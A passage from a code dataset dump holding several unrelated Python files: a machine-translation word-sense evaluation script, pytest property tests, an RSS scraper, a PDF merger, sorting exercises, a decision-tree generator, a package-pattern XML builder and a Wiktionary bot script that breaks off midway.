argparse\nimport stanza\nfrom spacy_stanza import StanzaLanguage\nimport pandas as pd\nfrom utils import load_text_file\nfrom spacy_dummy_tokenizer import WhitespaceTokenizer\n\n\ndef processLanguagePair(lgpair, keyfile_prefix, rawtranslations_glob, output_path):\n \"\"\"\n params:\n lgpair: translation language direction, e.g., en-de\n keyfile_prefix: prefix of the provided key files\n rawtranslations_glob: raw, detokenized translations\n output_path: path to store the WSD indices and their correct/incorrect labels. a dataframe with\n columns ['Sentence', 'Correct WSD output', 'Wrong WSD words indices']\n \"\"\"\n\n # load sense keys from file\n sense_keys = []\n k = load_text_file(keyfile_prefix + \".key.txt\")\n for line in k:\n elements = line.strip().split(\"\\t\")\n t = (elements[0], elements[1], elements[2], tuple(elements[3].split(\" \")), tuple(elements[4].split(\" \")))\n sense_keys.append(t)\n\n # load domain keys from file\n indomain_keys = set()\n outdomain_keys = set()\n d = load_text_file(keyfile_prefix + \".domain.txt\")\n for line in d:\n elements = line.strip().split(\"\\t\")\n if elements[2] == \"in\":\n indomain_keys.add((elements[0], elements[1]))\n else:\n outdomain_keys.add((elements[0], elements[1]))\n\n # load lemmatizer\n snlp = stanza.Pipeline(lang=lgpair[-2:])\n nlp = StanzaLanguage(snlp)\n # Replace the default tokenizer in the pipeline with the dummy tokenizer, since we will use this on\n # pre-tokenized text\n nlp.tokenizer = WhitespaceTokenizer(nlp)\n\n # load and process submissions\n results = {}\n rawsubmissions = sorted(glob.glob(rawtranslations_glob))\n for rawsubmission in rawsubmissions:\n # Create the df to store the sentence and word level WSD correct/incorrect result\n wsd_labels_df = pd.DataFrame(columns=['Sentence', 'Correct WSD output', 'Wrong WSD words indices'])\n\n counts = {\"pos_in\": 0, \"pos_out\": 0, \"neg_in\": 0, \"neg_out\": 0, \"unk_in\": 0, \"unk_out\": 0}\n trans_sentences = load_text_file(rawsubmission)\n trans_sentences_tok = perform_tokenization(lang=lgpair[-2:], inlist=trans_sentences)\n\n wsd_labels_df['Sentence'] = trans_sentences\n\n for i, (trans_sentence, trans_sentence_tok, key) in \\\n enumerate(zip(trans_sentences, trans_sentences_tok, sense_keys)):\n if (key[2], \" \".join(key[3])) in indomain_keys:\n suffix = \"_in\"\n elif (key[2], \" \".join(key[3])) in outdomain_keys:\n suffix = \"_out\"\n else:\n print(\"Domain not found:\", (key[2], \" \".join(key[3])))\n\n # first look in tokenized data\n tokwords = [x.lower() for x in trans_sentence_tok]\n posfound = any([posword in tokwords for posword in key[3]])\n negfound = any([negword in tokwords for negword in key[4]])\n\n negative_indices = []\n # Store the indices of the negative words in the tokenized sentence\n if negfound:\n for tokword_i, tokword in enumerate(tokwords):\n if tokword in key[4]:\n negative_indices.append(tokword_i)\n\n # if not found, look in lemmatized data\n if (not posfound) and (not negfound):\n posfound = False\n negfound = False\n\n # Perform lemmatization\n doc = nlp(trans_sentence)\n for token_i, token in enumerate(doc):\n if token.lemma_.lower() in key[3]:\n posfound = True\n if token.lemma_.lower() in key[4]:\n negfound = True\n negative_indices.append(token_i)\n\n if posfound and not negfound:\n counts[\"pos\" + suffix] += 1\n wsd_labels_df['Correct WSD output'].iloc[i] = True\n elif negfound:\n counts[\"neg\" + suffix] += 1\n wsd_labels_df['Correct WSD output'].iloc[i] = False\n else:\n counts[\"unk\" + suffix] += 1\n wsd_labels_df['Correct WSD output'].iloc[i] = None\n\n wsd_labels_df['Wrong WSD words indices'].iloc[i] = negative_indices\n\n wsd_labels_df.to_csv(output_path)\n\n counts[\"cov_in\"] = (counts[\"pos_in\"] + counts[\"neg_in\"]) / (\n counts[\"pos_in\"] + counts[\"neg_in\"] + counts[\"unk_in\"])\n counts[\"cov_out\"] = (counts[\"pos_out\"] + counts[\"neg_out\"]) / (\n counts[\"pos_out\"] + counts[\"neg_out\"] + counts[\"unk_out\"])\n counts[\"cov_all\"] = (counts[\"pos_in\"] + counts[\"neg_in\"] + counts[\"pos_out\"] + counts[\"neg_out\"]) / (\n counts[\"pos_in\"] + counts[\"neg_in\"] + counts[\"unk_in\"] + counts[\"pos_out\"] + counts[\"neg_out\"] +\n counts[\"unk_out\"])\n\n # Precision = pos / (pos+neg)\n counts[\"prec_in\"] = 0 if counts[\"pos_in\"] == 0 else counts[\"pos_in\"] / (counts[\"pos_in\"] + counts[\"neg_in\"])\n counts[\"prec_out\"] = 0 if counts[\"pos_out\"] == 0 else counts[\"pos_out\"] / (\n counts[\"pos_out\"] + counts[\"neg_out\"])\n counts[\"prec_all\"] = 0 if (counts[\"pos_in\"] + counts[\"pos_out\"]) == 0 else (counts[\"pos_in\"] + counts[\n \"pos_out\"]) / (counts[\"pos_in\"] + counts[\"neg_in\"] + counts[\"pos_out\"] + counts[\"neg_out\"])\n\n # RecallA = pos / (pos+unk)\n # This is the definition of recall that was used to compute the results tables\n # in the papers, but *does not* correspond to the definition given in the papers.\n counts[\"recA_in\"] = 0 if counts[\"pos_in\"] == 0 else counts[\"pos_in\"] / (counts[\"pos_in\"] + counts[\"unk_in\"])\n counts[\"recA_out\"] = 0 if counts[\"pos_out\"] == 0 else counts[\"pos_out\"] / (\n counts[\"pos_out\"] + counts[\"unk_out\"])\n counts[\"recA_all\"] = 0 if (counts[\"pos_in\"] + counts[\"pos_out\"]) == 0 else (counts[\"pos_in\"] + counts[\n \"pos_out\"]) / (counts[\"pos_in\"] + counts[\"unk_in\"] + counts[\"pos_out\"] + counts[\"unk_out\"])\n\n # RecallB = pos / (pos+unk+neg)\n # This formula corresponds to the definition given in the papers,\n # but is *not* the one that was used to compute the results tables.\n counts[\"recB_in\"] = 0 if counts[\"pos_in\"] == 0 else counts[\"pos_in\"] / (\n counts[\"pos_in\"] + counts[\"unk_in\"] + counts[\"neg_in\"])\n counts[\"recB_out\"] = 0 if counts[\"pos_out\"] == 0 else counts[\"pos_out\"] / (\n counts[\"pos_out\"] + counts[\"unk_out\"] + counts[\"neg_out\"])\n counts[\"recB_all\"] = 0 if (counts[\"pos_in\"] + counts[\"pos_out\"]) == 0 else (counts[\"pos_in\"] + counts[\n \"pos_out\"]) / (counts[\"pos_in\"] + counts[\"unk_in\"] + counts[\"neg_in\"] + counts[\"pos_out\"] + counts[\n \"unk_out\"] + counts[\"neg_out\"])\n\n # F1A is based on RecallA\n counts[\"f1A_in\"] = 0 if (counts[\"prec_in\"] + counts[\"recA_in\"]) == 0 else 2 * counts[\"prec_in\"] * counts[\n \"recA_in\"] / (counts[\"prec_in\"] + counts[\"recA_in\"])\n counts[\"f1A_out\"] = 0 if (counts[\"prec_out\"] + counts[\"recA_out\"]) == 0 else 2 * counts[\"prec_out\"] * counts[\n \"recA_out\"] / (counts[\"prec_out\"] + counts[\"recA_out\"])\n counts[\"f1A_all\"] = 0 if (counts[\"prec_all\"] + counts[\"recA_all\"]) == 0 else 2 * counts[\"prec_all\"] * counts[\n \"recA_all\"] / (counts[\"prec_all\"] + counts[\"recA_all\"])\n\n # F1B is based on RecallB\n counts[\"f1B_in\"] = 0 if (counts[\"prec_in\"] + counts[\"recB_in\"]) == 0 else 2 * counts[\"prec_in\"] * counts[\n \"recB_in\"] / (counts[\"prec_in\"] + counts[\"recB_in\"])\n counts[\"f1B_out\"] = 0 if (counts[\"prec_out\"] + counts[\"recB_out\"]) == 0 else 2 * counts[\"prec_out\"] * counts[\n \"recB_out\"] / (counts[\"prec_out\"] + counts[\"recB_out\"])\n counts[\"f1B_all\"] = 0 if (counts[\"prec_all\"] + counts[\"recB_all\"]) == 0 else 2 * counts[\"prec_all\"] * counts[\n \"recB_all\"] / (counts[\"prec_all\"] + counts[\"recB_all\"])\n\n submissionName = rawsubmission.split(\"/\")[-1]\n results[submissionName] = counts\n\n print(lgpair.upper())\n print()\n print(\n \"Submission\\t\\tInPos\\tInNeg\\tInUnk\\tInCoverage\\tInPrecision\\tInRecallA\\tInRecallB\\tInFscoreA\\tInFscoreB\\t\"\n \"\\tOutPos\\tOutNeg\\tOutUnk\\tOutCoverage\\tOutPrecision\\tOutRecallA\\tOutRecallB\\tOutFscoreA\\tOutFscoreB\\t\"\n \"\\tAllPos\\tAllNeg\\tAllUnk\\tAllCoverage\\tAllPrecision\\tAllRecallA\\tAllRecallB\\tAllFscoreA\\tAllFscoreB\")\n for submission, result in sorted(results.items(), key=lambda x: x[1][\"f1A_all\"], reverse=True):\n s = submission\n s += \"\\t\\t{}\\t{}\\t{}\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\".format(result[\"pos_in\"],\n result[\"neg_in\"],\n result[\"unk_in\"],\n 100 * result[\"cov_in\"],\n 100 * result[\"prec_in\"],\n 100 * result[\"recA_in\"],\n 100 * result[\"recB_in\"],\n 100 * result[\"f1A_in\"],\n 100 * result[\"f1B_in\"])\n s += \"\\t\\t{}\\t{}\\t{}\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\".format(result[\"pos_out\"],\n result[\"neg_out\"],\n result[\"unk_out\"],\n 100 * result[\"cov_out\"],\n 100 * result[\"prec_out\"],\n 100 * result[\"recA_out\"],\n 100 * result[\"recB_out\"],\n 100 * result[\"f1A_out\"],\n 100 * result[\"f1B_out\"])\n s += \"\\t\\t{}\\t{}\\t{}\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\".format(\n result[\"pos_in\"] + result[\"pos_out\"], result[\"neg_in\"] + result[\"neg_out\"],\n result[\"unk_in\"] + result[\"unk_out\"], 100 * result[\"cov_all\"], 100 * result[\"prec_all\"],\n 100 * result[\"recA_all\"], 100 * result[\"recB_all\"], 100 * result[\"f1A_all\"], 100 * result[\"f1B_all\"])\n print(s)\n print()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--lgpair', type=str, default='en-de')\n parser.add_argument('--keyfileprefix',\n type=str,\n default='txt/en-de',\n help='path of the *.key.txt and *.domain.txt files')\n parser.add_argument('--rawtranslations', type=str,\n help='path of the detokenized translation output')\n parser.add_argument('--output_path', type=str,\n help='path to store the WSD correct/incorrect labels and erroneous token indices')\n\n args = parser.parse_args()\n print(args)\n\n processLanguagePair(args.lgpair, args.keyfileprefix, args.rawtranslations, args.output_path)\n","repo_name":"TuAnh23/MuCoW","sub_path":"WMT2019/translation test suite/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":11986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70990525265","text":"from __future__ import annotations\n\n# System imports\nfrom copy import copy\n\n# Third-party imports\nimport pytest\n\n# Local imports\nfrom openide.nodes.properties_support import GetterSetterProperty\n\n\nclass RWMethods:\n\n def __init__(self) -> None:\n self.__attr = 0\n\n def get_attr(self) -> int:\n return self.__attr\n\n def set_attr(self, value: int) -> None:\n self.__attr = value\n\n not_a_method = 45\n\n\ndef test_read_write() -> None:\n rw = RWMethods()\n\n def check(prop: GetterSetterProperty, init_value: int, set_value: int) -> None:\n assert prop.value_type is int\n assert prop.can_read is True\n assert prop.can_write is True\n\n assert prop.value == init_value\n assert rw.get_attr() == init_value\n prop.value = set_value\n assert prop.value == set_value\n assert rw.get_attr() == set_value\n\n prop = GetterSetterProperty(rw.get_attr, rw.set_attr)\n check(prop, 0, 12)\n\n cloned_prop = copy(prop)\n check(cloned_prop, 12, 24)\n check(prop, 24, 36)\n\n\nclass ROMethods:\n\n def __init__(self, value: int) -> None:\n self.__attr = value\n\n def get_attr(self) -> int:\n return self.__attr\n\n def set_attr(self, value: int) -> None:\n self.__attr = value\n\n\ndef test_read_only() -> None:\n ro = ROMethods(72)\n\n def check(prop: GetterSetterProperty, init_value: int) -> None:\n assert prop.value_type is int\n assert prop.can_read is True\n assert prop.can_write is False\n\n assert prop.value == init_value\n\n with pytest.raises(AttributeError):\n prop.value = 12\n\n prop = GetterSetterProperty(ro.get_attr)\n check(prop, 72)\n\n cloned_prop = copy(prop)\n check(cloned_prop, 72)\n\n ro.set_attr(46)\n check(prop, 46)\n check(cloned_prop, 46)\n\n\ndef test_write_only() -> None:\n wo = RWMethods()\n\n def check(prop: GetterSetterProperty, init_value: int, set_value: int) -> None:\n assert prop.value_type is int\n assert prop.can_read is False\n assert prop.can_write is True\n\n assert wo.get_attr() == init_value\n prop.value = set_value\n assert wo.get_attr() == set_value\n\n with pytest.raises(AttributeError):\n _ = prop.value\n\n prop = GetterSetterProperty(None, wo.set_attr)\n check(prop, 0, 27)\n\n cloned_prop = copy(prop)\n check(cloned_prop, 27, 54)\n check(prop, 54, 81)\n\n\ndef test_not_method() -> None:\n rw = RWMethods()\n\n with pytest.raises(TypeError):\n GetterSetterProperty(rw.not_a_method) # type: ignore\n\n with pytest.raises(TypeError):\n GetterSetterProperty(None, rw.not_a_method) # type: ignore\n\n\ndef test_no_getter_and_setter() -> None:\n with pytest.raises(ValueError):\n GetterSetterProperty()\n\n\nclass NoTypeGetter:\n\n def __init__(self, value: int) -> None:\n self.__attr = value\n\n def get_attr(self): # type: ignore\n return self.__attr\n\n def set_attr(self, value: int) -> None:\n self.__attr = value\n\n\ndef test_no_type_hint() -> None:\n ro = NoTypeGetter(83)\n\n with pytest.raises(ValueError):\n GetterSetterProperty(ro.get_attr)\n\n def check(prop: GetterSetterProperty, init_value: int) -> None:\n assert prop.value_type is int\n assert prop.can_read is True\n assert prop.can_write is False\n\n assert prop.value == init_value\n\n with pytest.raises(AttributeError):\n prop.value = 12\n\n prop = GetterSetterProperty(ro.get_attr, value_type=int)\n check(prop, 83)\n\n cloned_prop = copy(prop)\n check(cloned_prop, 83)\n\n ro.set_attr(41)\n check(prop, 41)\n check(cloned_prop, 41)\n","repo_name":"AxelVoitier/openide","sub_path":"tests/nodes/properties/test_getter_setter_property.py","file_name":"test_getter_setter_property.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15619478174","text":"from bs4 import BeautifulSoup\nimport lxml\nimport requests\n\nclass UrlNotFound(BaseException):\n e_message = \"cannot open url\"\n ...\n\ndef get_urls(main_url: str, paths: list[str]) -> list[str]:\n urls = []\n\n for idx, path in enumerate(paths):\n urls.append(main_url + path)\n\n return urls\n\n\ndef get_xml(url: str = \"\") -> BeautifulSoup:\n\n r:requests.Response = requests.get(url)\n\n if r.status_code == 200:\n content = r.content\n return BeautifulSoup(content, \"lxml-xml\")\n raise UrlNotFound\n\n\n\nif __name__ == '__main__':\n print(get_xml(\"https://www.welt.de/feeds/ooh/out-of-home/bundesliga/news\").prettify())\n","repo_name":"Askil61/Bundesliga","sub_path":"app/py/get_xml.py","file_name":"get_xml.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33752017661","text":"import PyPDF2 as pdf\r\nimport os\r\n\r\ninputdir = r'C:\\Users\\saadbasheer\\Desktop\\Code\\Python\\Projects\\pdfmerger\\input'\r\noutputdir = r'C:\\Users\\saadbasheer\\Desktop\\Code\\Python\\Projects\\pdfmerger\\output'\r\n\r\ndef pdfmerger(input_dir, output_dir):\r\n merger = pdf.PdfMerger()\r\n filename = \"merged_pdf\"\r\n for files in os.listdir(inputdir):\r\n if files.endswith('.pdf'):\r\n merger.append(os.path.join(inputdir, files))\r\n\r\n merger.write(os.path.join(output_dir, filename))\r\n\r\n\r\npdfmerger(inputdir, outputdir)\r\n","repo_name":"Saadbasheer/pdf-merger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71465020305","text":"# Selection sort\n\ndef selection(arr):\n for i in range(len(arr)):\n min = i\n for j in range(i+1,len(arr)):\n if min >arr[j]:\n min = j\n arr[i],arr[min]=arr[min],arr[i]\n return arr\n\ns = [1,5,8,3,21,2,4]\nprint(selection(s))\n\n\nd=[1,1,2,3,4,3,5,2]\nindex = 0\nfor i in range(len(d)):\n for j in range(i+1,len(d)):\n if d[i]==d[j]:\n d.pop(d[j])\n break\n\nprint(d)\nf=[]\nfor i in d:\n if i not in f:\n f.append(i)\nprint(f)\n\ng=[]\nfor i in range(len(d)):\n for j in range(i+1,len(d)):\n if d[i]==d[j] and d[i] not in g:\n g.append(d[i])\n \nprint(\"g is \",g)\n\nresult =0\nfor i in range(len(d)):\n result ^=d[i]\n\nprint(result)\n\nz = [1,2,1,4,5,7,4,5]\n\nclass Solution:\n def threeSum(self, nums):\n n = len(nums)\n nums.sort()\n l=set()\n for i in range(n-2):\n j = i+1\n k = n-1\n while(j0:\n left = generate_balanced_tree_rec(max_depth-1, bitlength, num_attributes, seed)\n right = generate_balanced_tree_rec(max_depth-1, bitlength, num_attributes, seed)\n threshold = random.randint(0, 2**bitlength-1)\n feature = random.randint(0, num_attributes-1)\n t = Internal(threshold, feature, left, right)\n else:\n t = Leaf(random.randint(0, 2**CLASSIFICATION_VALUE_BITLENGTH-1))\n\n return t \n\n\ndef generate_balanced_tree(max_depth, path, bitlength, num_attributes, seed=None):\n if seed is not None:\n random.seed(seed)\n with open(path, 'w') as output_file:\n stack=[0]\n while len(stack) > 0:\n current_depth = stack[0]\n if current_depth == max_depth:\n threshold = random.randint(0, 2**CLASSIFICATION_VALUE_BITLENGTH-1)\n attribute_index = -1\n output_file.write(f'{threshold} {attribute_index}\\n')\n \n stack = stack[1:]\n elif current_depth < max_depth:\n threshold = random.randint(0, 2**bitlength-1)\n attribute_index = random.randint(0, num_attributes-1)\n output_file.write(f'{threshold} {attribute_index}\\n')\n stack = [current_depth+1, current_depth+1] + stack[1:]\n else:\n print(\"This should not happen!\")\n\ndef generate_input(path, bitlength, num_attributes, seed=None):\n if seed is not None:\n random.seed(seed)\n with open(path, 'w') as output_file:\n for _ in range(num_attributes):\n attribute_value = random.randint(0, 2**bitlength-1)\n output_file.write(f'{attribute_value}\\n')\n \n\ndef generate_balanced_tree_from_args(args):\n max_depth = args.max_depth\n path = args.path\n bitlength=args.bitlength\n num_attributes = args.num_attributes\n generate_balanced_tree(max_depth=max_depth,path=path,bitlength=bitlength,num_attributes=num_attributes)\n\n\ndef catalan(n):\n return comb(2*n, n) / (n+1)\n\ndef recursive_uniform_tree_generator(remaining_inner_nodes):\n if remaining_inner_nodes == 0:\n return [True]\n\n remaining_inner_nodes -= 1\n weights = [ catalan(i)*catalan(remaining_inner_nodes-i) for i in range(0,remaining_inner_nodes+1) ]\n \n left_inner_nodes=random.choices(range(0,remaining_inner_nodes+1), weights=weights)[0]\n right_inner_nodes=remaining_inner_nodes-left_inner_nodes\n\n return [False] + recursive_uniform_tree_generator(left_inner_nodes) + recursive_uniform_tree_generator(right_inner_nodes)\n\ndef generate_random_unbalanced_tree(args):\n number_of_nodes=args.number_of_nodes\n preorder_representation=recursive_uniform_tree_generator(number_of_nodes)\n generate_and_write_tree(preorder_representation, args)\n\n# if __name__ == '__main__':\n\n# parser = argparse.ArgumentParser()\n\n# # common for both cases \n# parser.add_argument('--bitlength', type=int, default=32)\n# parser.add_argument('--num_attributes', type=int, default=4)\n# parser.add_argument('--balanced', const=True, default=False, nargs='?')\n\n# # balanced case\n# parser.add_argument('--max_depth', type=int, default=4)\n# parser.add_argument('--path', type=str, required=True)\n\n# # unbalanced case\n# parser.add_argument('--number_of_nodes', type=int, default=31)\n\n# args = parser.parse_args()\n\n# if args.balanced:\n# print(\"Balanced!\")\n# generate_balanced_tree_from_args(args)\n# else:\n# print(\"Not Balanced!\")\n# generate_random_unbalanced_tree(args)\n \n\nimport os \nimport json\n\nWORKSPACE_DIR='/home/r5akhava/private-decision-tree-evaluation/experiments'\n\nif __name__ == '__main__':\n write_path = 'datasets_synthetic'\n for max_depth in range(2,21):\n for bitlength in [8, 12, 16, 24, 32]:\n for num_attributes in range(2, 200, 10):\n t = generate_balanced_tree_rec(max_depth, bitlength, num_attributes)\n with open(os.path.join(WORKSPACE_DIR, write_path, f'tree_depth_{max_depth}_n_{bitlength}_attr_{num_attributes}.json'), 'w+') as f:\n f.write(json.dumps(t.__dict__))\n\n","repo_name":"RasoulAM/private-decision-tree-evaluation","sub_path":"experiments/generate_random_tree.py","file_name":"generate_random_tree.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35325417345","text":"import yaml\nimport sys, os\nimport optparse\nfrom lxml import etree\n\nrpm_ns=\"http://linux.duke.edu/metadata/rpm\"\npattern_ns=\"http://novell.com/package/metadata/suse/pattern\"\nNSMAP = {None : pattern_ns, \"rpm\": rpm_ns}\n\nNSMAP_GROUP = {None : pattern_ns, \"rpm\": rpm_ns, \"patterns\": pattern_ns}\n\ndef process_yaml(stream, version, release, xmlroot, nsmap_name, newobsapi):\n\t\"Process all documents in the yaml stream and return a count of number handled\"\n\n\tall_docs = yaml.load_all(stream, Loader = yaml.SafeLoader)\n\t\n\tfor y in all_docs:\n\t\t# \n\t\tproot = etree.SubElement(xmlroot, \"pattern\", nsmap=nsmap_name)\n\t\t\n\t\t# \n\t\tetree.SubElement(proot, \"name\").text = y['Name']\n\n\t\t# Old OBS isn't able to handle these options.\n\t\tif newobsapi:\n\t\t\t# \n\t\t\tif 'Version' in y or version:\n\t\t\t\tentry = etree.SubElement(proot, \"version\")\n\t\t\t\tver = \"0\"\n\t\t\t\tif version:\n\t\t\t\t\tver = version\n\t\t\t\telse:\n\t\t\t\t\tver = y['Version']\n\n\t\t\t\t# Set to 0 by default as that is what OBS expects.\n\t\t\t\tepoch = \"0\"\n\t\t\t\tif 'Epoch' in y:\n\t\t\t\t\tepoch = y['Epoch']\n\n\t\t\t\t# As above...\n\t\t\t\trel = \"0\"\n\t\t\t\tif release:\n\t\t\t\t\trel = release\n\t\t\t\tif 'Release' in y:\n\t\t\t\t\trel = y['Release']\n\n\t\t\t\tentry.set('ver', \"%s\" % ver)\n\t\t\t\tentry.set('epoch', \"%s\" % epoch)\n\t\t\t\tentry.set('rel', \"%s\" % rel)\n\n\t\t\t# \n\t\t\tif 'Arch' in y:\n\t\t\t\tetree.SubElement(proot, \"arch\").text = \"%s\" % y['Arch']\n\n\t\t#

\n\t\tetree.SubElement(proot, \"summary\").text = y['Summary']\n\t\t# \n\t\tetree.SubElement(proot, \"description\").text = y['Description']\n\t\t# \n\t\tetree.SubElement(proot, \"uservisible\")\n\t\t# \n\t\tcat = etree.SubElement(proot, \"category\")\n\t\tcat.text = \"Base Group\"\n\t\tcat.set(\"lang\", \"en\")\n\n\t\tpackage_keys = ['Packages','Conflicts', 'Requires', 'Recommends', 'Suggests', 'Provides', 'Obsoletes']\n\t\tfor key in package_keys:\n\t\t\tif key not in y:\n\t\t\t\tcontinue\n\n\t\t\tcollect = y[key]\n\t\t\tif key == \"Packages\":\n\t\t\t\t# Support obsoleted keys, this should be removed in the future\n\t\t\t\tkey = \"Requires\"\n\t\t\t\tprint (\"WARNING: Oboleted key 'Packages' in .yaml please change to 'Requires'.\")\n\t\t\t\n\t\t\treq = etree.SubElement(proot, \"{%s}%s\" % (rpm_ns,key.lower()))\n\n\t\t\tfor p in collect:\n\t\t\t\tif type(p).__name__=='dict':\n\t\t\t\t\tprint (\"ERROR: Found dict and expected string value. '%s'\" % (p))\n\t\t\t\t\tsys.exit(1)\n\t\t\t\tentry = etree.SubElement(req, \"{%s}entry\" %rpm_ns)\n\n\t\t\t\tname = p\n\t\t\t\tver = None\n\t\t\t\top_in = [\">=\", \"<=\", \">\", \"<\", \"=\"]\n\t\t\t\top_out = [\"GE\", \"LE\", \"GT\", \"LT\", \"EQ\"]\n\t\t\t\topc = 0\n\t\t\t\tfor op in op_in:\n\t\t\t\t\tif op in p:\n\t\t\t\t\t\tname, ver = p.split(op)\n\t\t\t\t\t\tbreak\n\t\t\t\t\topc = opc + 1\n\n\t\t\t\tentry.set(\"name\", name.strip())\n\t\t\t\tif ver:\n\t\t\t\t\tentry.set(\"flags\", \"%s\" % (op_out[opc]))\n\t\t\t\t\tentry.set(\"ver\", \"%s\" % (ver.strip()))\n\ndef create_patterns(patterns_dir, version, release, outputdir, newobsapi):\n\tdirlist = os.listdir(patterns_dir)\n\tdirlist.sort()\n\tfor f in dirlist:\n\t\tif not f.endswith('.yaml'):\n\t\t\tcontinue\n\t\t\n\t\tstream = open(\"%s/%s\" %(patterns_dir,f), 'r')\n\t\txmlroot = etree.Element(\"temporary_root\", nsmap=NSMAP)\n\t\t\n\t\tprocess_yaml(stream, version, release, xmlroot, NSMAP, newobsapi)\n\n\t\tfor pattern in xmlroot.findall(\"pattern\"):\n\t\t\t\n\t\t\tname = pattern.find(\"name\")\n\t\t\tif name == None:\n\t\t\t\tprint (\"Pattern didn't have name skipping.\")\n\t\t\t\tcontinue\n\t\t\toutput_file = \"%s/%s.xml\" % (outputdir,name.text.lower())\n\t\t\tprint (\"Working on %s\" % (output_file))\n\n\t\t\tetree.ElementTree(pattern).write(output_file, pretty_print=True)\n\ndef merge_patterns(patterns_dir, version, release, outputdir, newobsapi):\n\txmlroot = etree.Element(\"patterns\")\n\toutput_file = \"%s/patterns.xml\" % (outputdir)\n\tdirlist = os.listdir(patterns_dir)\n\tdirlist.sort()\n\n\tfor f in dirlist:\n\t\tif not f.endswith('.yaml'):\n\t\t\tcontinue\n\t\tprint (\"Merging %s to %s.\" % (f,output_file))\n\t\tstream = file(\"%s/%s\" %(patterns_dir,f), 'r')\n\t\tprocess_yaml(stream, version, release, xmlroot, NSMAP_GROUP, newobsapi)\n\n\tpatterns = xmlroot.findall(\"pattern\")\n\txmlroot.set('count', \"%d\" % (len(patterns)))\n\n\tetree.ElementTree(xmlroot).write(output_file, pretty_print=True)\n\nif __name__ == '__main__':\n\tparser = optparse.OptionParser()\n\n\tparser.add_option(\"\", \"--patternxml\", action=\"store_true\", dest=\"patternxml\",\n\t\t\tdefault=False,\n\t\t\thelp=\"Create separated pattern XML file for each pattern.\")\n\tparser.add_option(\"\", \"--patternsxml\", action=\"store_true\", dest=\"patternsxml\",\n\t\t\tdefault=False,\n\t\t\thelp=\"Create merged patterns.xml from all the available patterns.\")\n\tparser.add_option(\"\", \"--groupxml\", action=\"store_true\", dest=\"groupxml\",\n\t\t\tdefault=False,\n\t\t\thelp=\"Create group.xml.\")\n\tparser.add_option(\"-p\", \"--patterndir\", type=\"string\", dest=\"patterndir\",\n\t\t\tdefault=None,\n\t\t\thelp=\"Directory where the pattern .yaml files are located.\")\n\tparser.add_option(\"-o\", \"--outputdir\", type=\"string\", dest=\"outputdir\",\n\t\t\tdefault=\".\",\n\t\t\thelp=\"Output directory where the resulting .xml files are created.\")\n\tparser.add_option(\"\", \"--old-obs-xml-format\", action=\"store_false\", dest=\"newobsapi\",\n\t\t\tdefault=True,\n\t\t\thelp=\"The old OBS api isn't able to handle the newer xml format.\")\n\tparser.add_option(\"--version\", type=\"string\", dest=\"version\", default=None, help=\"Version number\")\n\tparser.add_option(\"--release\", type=\"string\", dest=\"release\", default=None, help=\"Release number\")\n\t\n\t(options, args) = parser.parse_args()\n\t\n\tif (options.groupxml):\n\t\tprint (\"ERROR: Groupxml isn't supported atm.\")\n\t\texit(1)\n\n\tif (not options.patternsxml and not options.patternxml):\n\t\t# Default to patternxml.\n\t\toptions.patternxml = True\n\t\n\tif (not options.patterndir or not os.path.exists(options.patterndir)):\n\t\tprint (\"Error: Pattern dir '%s' doesn't exist.\" % (options.patterndir))\n\t\texit(1)\n\t\n\tif options.outputdir and not os.path.exists(options.outputdir):\n\t\tos.makedirs(options.outputdir)\n\t\n\tif options.patternxml:\n\t\tcreate_patterns(options.patterndir, options.version, options.release, options.outputdir, options.newobsapi)\n\n\tif options.patternsxml:\n\t\tmerge_patterns(options.patterndir, options.version, options.release, options.outputdir, options.newobsapi)\n\n","repo_name":"sailfishos/repomd-pattern-builder","sub_path":"repomd-pattern-builder.py","file_name":"repomd-pattern-builder.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26336782497","text":"'''\nReplace U+2019 RIGHT SINGLE QUOTATION MARK with U+02BC MODIFIER LETTER APOSTROPHE in Taos entries.\n'''\n\nimport argparse\nimport itertools\nimport re\n\nimport pywikibot\nimport pywikibot.pagegenerators\nimport wikitextparser\n\nquote_mark = '\\N{RIGHT SINGLE QUOTATION MARK}'\nmod_letter = '\\N{MODIFIER LETTER APOSTROPHE}'\nmove_summary = 'Replace curly quotes (U+2019) with modifier letter apostrophes (U+02BC) per [[Wiktionary:Requests for moves, mergers and splits#Entries in CAT:Taos lemmas with curly apostrophes|discussion]].'\ntext_summary = move_summary\ncategory_names = ['Taos lemmas', 'Taos non-lemma forms', 'Taos noun forms']\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-l', '--limit', default=-1, type=int)\n\tparser.add_argument('-d', '--dry-run', action='store_true')\n\targs = parser.parse_args()\n\n\tsite = pywikibot.Site()\n\tpage_generators = [pywikibot.pagegenerators.CategorizedPageGenerator(pywikibot.Category(site, name)) for name in category_names]\n\twith open('taos_skipped.txt', 'w') as skipped_file:\n\t\tfor i, page in enumerate(itertools.chain.from_iterable(page_generators)):\n\t\t\tif 0 < args.limit <= i:\n\t\t\t\tprint(f'Limit reached.')\n\t\t\t\tbreak\n\n\t\t\tparsed_page = wikitextparser.parse(page.text)\n\t\t\tsections = parsed_page.get_sections(level=2)\n\t\t\tif len(sections) == 1 and sections[0].title.strip() == 'Taos':\n\t\t\t\t# Replace in page title\n\t\t\t\tif quote_mark 